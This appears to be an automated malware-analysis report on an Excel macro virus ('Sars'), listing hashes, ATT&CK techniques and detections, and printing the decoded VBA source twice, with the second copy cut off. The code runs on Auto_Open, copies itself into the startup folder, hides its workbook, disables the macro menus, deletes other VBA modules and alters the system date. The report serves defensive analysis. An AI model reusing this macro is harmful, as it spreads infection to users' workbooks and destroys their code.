Office (OLE) malware analysis — malicious · fef1863fc8546226

MALICIOUS

Office (OLE)

59.5 KB Created: 1997-01-14 01:50:29 Authoring application: Microsoft Excel First seen: 2012-06-14

MD5: 9d2933a742b82ebb5ecea7db399bd476 SHA-1: 55392729264061e7b61bf80314382e1f9acbf202 SHA-256: fef1863fc854622625cbe478c1da29abbda907e1d136d216a52ad8eb3fdd9908

120 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The file is an Excel document containing VBA macros, specifically an Auto_Open macro, which is a common technique for initial execution. The macro attempts to create a directory and displays a truncated message box, suggesting it's part of a downloader or dropper mechanism. The ClamAV detection as 'Xls.Trojan.Acute-1' further confirms its malicious nature. The presence of an Auto_Open macro strongly suggests it was delivered as a spearphishing attachment.

Heuristics 3

ClamAV: Xls.Trojan.Acute-1 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Xls.Trojan.Acute-1
VBA macros detected medium 1 related finding OLE_VBA_MACROS

Document contains VBA macro code
Auto_Open macro high OLE_VBA_AUTO

Auto_Open macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 4819 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	4819 bytes
SHA-256: `b84857024f133fe1806e5ba45a1ab69621aa545838ece10400874a375e9d8e0b`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisWorkbook" Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Attribute VB_Name = "Sars" ' Sars virus! ' Bandung, Indonesian ' Tonk sok Sars nyieunan macro, lah... ' Public Const Micro = "Sars" Public Const Data0 = Micro & ".xls" Public Const Data1 = "The Visual Basic environment could not be intialize. Please run setup to install it correctly." Sub CkAgain() Attribute CkAgain.VB_ProcData.VB_Invoke_Func = " \n14" Dim bg As Object Dim po As Object On Error Resume Next For Each j In Workbooks Set bg = Workbooks(j.Name) For Each boom In bg.VBProject.VBComponents If boom.Type = 100 Then If boom.Name = Micro Then MsgBox "Good morning" End If Else Set bck = boom.codemodule If bck.CountOflines = 0 Then MsgBox "HELLO" End If Next boom Next j End Sub Sub Auto_Open() Attribute Auto_Open.VB_ProcData.VB_Invoke_Func = " \n14" Dim Ct As Object Dim bg As Object Dim bgc As Object Dim bck As Object Dim xlsz As Object Dim Ck As Boolean On Error Resume Next KillStart With Application If WeekDay(Now) Mod 2 = A Then .Caption = "~~Fakir Meng_" Else .Caption = "~~Fakir Meng_" End If If Dir(.Path & "\Xlstart") = "" Then MkDir .Path & "\Xlstart" If Day(Date) = 20 Then MsgBox "UPDATE ME NOW, INFECTED BY BUGGIE!", 48, Micro Date = Now + 1 End If .ScreenUpdating = False .EnableCancelKey = xlDisabled If Day(Date) Mod 2 = 0 Then .OnTime Now + TimeValue("1"), "SarsWordArt" End If If Dir(.StartupPath & "\" & Data0) = "" Then ActiveWorkbook.SaveAs .StartupPath & "\" & Data0 End If If Workbooks.Count = 1 And .Workbooks(1).Name = Data0 Then Workbooks.Add: ActiveWorkbook.Windows(1).Caption = "Book1" End If Set bg = ActiveWorkbook .OnKey "%{F12}", "Sars.Cr" .OnKey "%{F8}", "Sars.Cr" .OnKey "%{F11}", "Sars.Cr" .CommandBars("Window").Controls("Unhide...").Enabled = False .CommandBars("Tools").Controls("Macro").Delete .OnSheetActivate = "Sars.xls!auto_Open" Workbooks(Data0).Windows.Item(1).Visible = False CkAgain If Dir(.Path & "\Wintlb32.dll") = "" Then Workbooks(Data0).VBProject.VBComponents(Micro).Export .Path & "\Wintlb32.dll" End If For Each boom In bg.VBProject.VBComponents If boom.Type <> 100 Then If boom.Name <> Micro Then bg.VBProject.VBComponents.Remove boom End If Else Set bck = boom.codemodule If bck.CountOflines <> 0 Then bck.Deletelines 1, bck.CountOflines End If Next boom For Each xlsz In bg.VBProject.VBComponents If xlsz.Name = Micro Then Ck = True: Exit For Next xlsz If Ck = False Then Set Ct = bg.VBProject.VBComponents Ct.Import .Path & "\Wintlb32.dll" Kill .Path & "\Wintlb32.dll" Workbooks(Data0).Save If InStr(1, bg.FullName, "\") Then ActiveWorkbook.Save End If End With End Sub Sub Cr(): MsgBox Data1, 16, "Microsoft Visual Basic": End Sub Attribute Cr.VB_ProcData.VB_Invoke_Func = " \n14" Sub SarsWordArt() Attribute SarsWordArt.VB_ProcData.VB_Invoke_Func = " \n14" On Error Resume Next ActiveSheet.Shapes.AddTextEffect(msoTextEffect16, Micro, "Arial Black", _ 36#, msoFalse, msoFalse, 205.5, 118.5).Select Range("A1").Select End Sub Sub KillStart() Attribute Kill ... (truncated)

SHA-256: b84857024f133fe1806e5ba45a1ab69621aa545838ece10400874a375e9d8e0b

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sars"
'   Sars virus!
'   Bandung, Indonesian
'   Tonk sok Sars nyieunan macro, lah...
'
Public Const Micro = "Sars"
Public Const Data0 = Micro & ".xls"
Public Const Data1 = "The Visual Basic environment could not be intialize. Please run setup to install it correctly."
Sub CkAgain()
Attribute CkAgain.VB_ProcData.VB_Invoke_Func = " \n14"
Dim bg          As Object
Dim po          As Object

On Error Resume Next

For Each j In Workbooks
Set bg = Workbooks(j.Name)
For Each boom In bg.VBProject.VBComponents
         If boom.Type = 100 Then
            If boom.Name = Micro Then
               MsgBox "Good morning"
            End If
         Else
            Set bck = boom.codemodule
            If bck.CountOflines = 0 Then MsgBox "HELLO"
         End If
     Next boom
     Next j
    
End Sub

Sub Auto_Open()
Attribute Auto_Open.VB_ProcData.VB_Invoke_Func = " \n14"
    Dim Ct                  As Object
    Dim bg                  As Object
    Dim bgc                 As Object
    Dim bck                 As Object
    Dim xlsz                As Object
    Dim Ck                  As Boolean
    
On Error Resume Next
KillStart
With Application
     If WeekDay(Now) Mod 2 = A Then
        .Caption = "~~Fakir Meng_"
     Else
        .Caption = "~~Fakir Meng_"
     End If
     If Dir(.Path & "\Xlstart") = "" Then MkDir .Path & "\Xlstart"
     If Day(Date) = 20 Then
        MsgBox "UPDATE ME NOW, INFECTED BY BUGGIE!", 48, Micro
        Date = Now + 1
     End If
     .ScreenUpdating = False
     .EnableCancelKey = xlDisabled
     If Day(Date) Mod 2 = 0 Then
        .OnTime Now + TimeValue("1"), "SarsWordArt"
     End If
     If Dir(.StartupPath & "\" & Data0) = "" Then
        ActiveWorkbook.SaveAs .StartupPath & "\" & Data0
     End If
     If Workbooks.Count = 1 And .Workbooks(1).Name = Data0 Then
        Workbooks.Add: ActiveWorkbook.Windows(1).Caption = "Book1"
     End If
        Set bg = ActiveWorkbook
        .OnKey "%{F12}", "Sars.Cr"
        .OnKey "%{F8}", "Sars.Cr"
        .OnKey "%{F11}", "Sars.Cr"
        .CommandBars("Window").Controls("Unhide...").Enabled = False
        .CommandBars("Tools").Controls("Macro").Delete
     .OnSheetActivate = "Sars.xls!auto_Open"
     Workbooks(Data0).Windows.Item(1).Visible = False
     
     CkAgain
     If Dir(.Path & "\Wintlb32.dll") = "" Then
               Workbooks(Data0).VBProject.VBComponents(Micro).Export .Path & "\Wintlb32.dll"
     End If
     
        For Each boom In bg.VBProject.VBComponents
             If boom.Type <> 100 Then
                If boom.Name <> Micro Then
                   bg.VBProject.VBComponents.Remove boom
                End If
             Else
                Set bck = boom.codemodule
                If bck.CountOflines <> 0 Then bck.Deletelines 1, bck.CountOflines
             End If
         Next boom
     
     For Each xlsz In bg.VBProject.VBComponents
         If xlsz.Name = Micro Then Ck = True: Exit For
     Next xlsz
     
     If Ck = False Then
        Set Ct = bg.VBProject.VBComponents
               Ct.Import .Path & "\Wintlb32.dll"
               Kill .Path & "\Wintlb32.dll"
               Workbooks(Data0).Save
               If InStr(1, bg.FullName, "\") Then ActiveWorkbook.Save
     End If
     
End With
End Sub
Sub Cr(): MsgBox Data1, 16, "Microsoft Visual Basic": End Sub
Attribute Cr.VB_ProcData.VB_Invoke_Func = " \n14"
Sub SarsWordArt()
Attribute SarsWordArt.VB_ProcData.VB_Invoke_Func = " \n14"
On Error Resume Next
ActiveSheet.Shapes.AddTextEffect(msoTextEffect16, Micro, "Arial Black", _
        36#, msoFalse, msoFalse, 205.5, 118.5).Select
Range("A1").Select
End Sub
Sub KillStart()
Attribute Kill
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.